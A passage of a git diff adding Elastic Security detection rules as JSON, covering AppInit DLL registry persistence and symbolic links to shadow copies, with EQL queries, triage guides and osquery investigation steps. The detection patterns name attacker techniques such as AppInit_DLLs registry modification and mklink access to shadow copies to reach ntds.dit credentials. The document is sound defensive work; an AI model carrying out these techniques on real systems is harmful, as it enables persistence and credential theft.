Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 9 + }, + "id": "d00f33e7-b57d-4023-9952-2db91b1767c4_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_109.json b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_109.json new file mode 100644 index 00000000000..8e482f64181 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_109.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "AppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads user32.dll) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications. Attackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Registry Persistence via AppInit DLL", + "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\"\n ) and\n not process.executable : (\n \"?:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\Display.NvContainer\\\\NVDisplay.Container.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Program Files\\\\Commvault\\\\Base\\\\cvd.exe\",\n \"?:\\\\Program Files\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"?:\\\\Program Files (x86)\\\\Commvault\\\\Base\\\\cvd.exe\",\n \"?:\\\\Program Files (x86)\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"?:\\\\Program Files\\\\NVIDIA Corporation\\\\Display.NvContainer\\\\NVDisplay.Container.exe\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d0e159cf-73e9-40d1-a9ed-077e3158a855", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.010", + "name": "AppInit DLLs", + "reference": "https://attack.mitre.org/techniques/T1546/010/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "d0e159cf-73e9-40d1-a9ed-077e3158a855_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_110.json b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_110.json new file mode 100644 index 00000000000..ef42a43c9df --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_110.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "AppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads user32.dll) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications. Attackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Registry Persistence via AppInit DLL", + "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\"\n ) and\n not process.executable : (\n \"?:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\Display.NvContainer\\\\NVDisplay.Container.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Program Files\\\\Commvault\\\\Base\\\\cvd.exe\",\n \"?:\\\\Program Files\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"?:\\\\Program Files (x86)\\\\Commvault\\\\Base\\\\cvd.exe\",\n \"?:\\\\Program Files (x86)\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"?:\\\\Program Files\\\\NVIDIA Corporation\\\\Display.NvContainer\\\\NVDisplay.Container.exe\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d0e159cf-73e9-40d1-a9ed-077e3158a855", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.010", + "name": "AppInit DLLs", + "reference": "https://attack.mitre.org/techniques/T1546/010/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "d0e159cf-73e9-40d1-a9ed-077e3158a855_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_110.json b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_110.json new file mode 100644 index 00000000000..c70dda89585 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_110.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies the creation of symbolic links to a shadow copy. Symbolic links can be used to access files in the shadow copy, including sensitive files such as ntds.dit, System Boot Key and browser offline credentials.", + "false_positives": [ + "Legitimate administrative activity related to shadow copies." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Symbolic Link to Shadow Copy Created", + "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n (?process.pe.original_file_name in (\"Cmd.Exe\",\"PowerShell.EXE\")) or\n (process.name : (\"cmd.exe\", \"powershell.exe\"))\n ) and\n\n /* Create Symbolic Link to Shadow Copies */\n process.args : (\"*mklink*\", \"*SymbolicLink*\") and process.command_line : (\"*HarddiskVolumeShadowCopy*\")\n", + "references": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mklink", + "https://2017.zeronights.org/wp-content/uploads/materials/ZN17_Kheirkhabarov_Hunting_for_Credentials_Dumping_in_Windows_Environment.pdf", + "https://blog.netwrix.com/2021/11/30/extracting-password-hashes-from-the-ntds-dit-file/", + "https://www.hackingarticles.in/credential-dumping-ntds-dit/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0", + "setup": "## Setup\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + }, + { + "id": "T1003.003", + "name": "NTDS", + "reference": "https://attack.mitre.org/techniques/T1003/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_111.json b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_111.json new file mode 100644 index 00000000000..5a047b8273a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_111.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies the creation of symbolic links to a shadow copy. Symbolic links can be used to access files in the shadow copy, including sensitive files such as ntds.dit, System Boot Key and browser offline credentials.", + "false_positives": [ + "Legitimate administrative activity related to shadow copies." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Symbolic Link to Shadow Copy Created", + "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n (?process.pe.original_file_name in (\"Cmd.Exe\",\"PowerShell.EXE\")) or\n (process.name : (\"cmd.exe\", \"powershell.exe\"))\n ) and\n\n /* Create Symbolic Link to Shadow Copies */\n process.args : (\"*mklink*\", \"*SymbolicLink*\") and process.command_line : (\"*HarddiskVolumeShadowCopy*\")\n", + "references": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mklink", + "https://2017.zeronights.org/wp-content/uploads/materials/ZN17_Kheirkhabarov_Hunting_for_Credentials_Dumping_in_Windows_Environment.pdf", + "https://blog.netwrix.com/2021/11/30/extracting-password-hashes-from-the-ntds-dit-file/", + "https://www.hackingarticles.in/credential-dumping-ntds-dit/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0", + "setup": "## Setup\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + }, + { + "id": "T1003.003", + "name": "NTDS", + "reference": 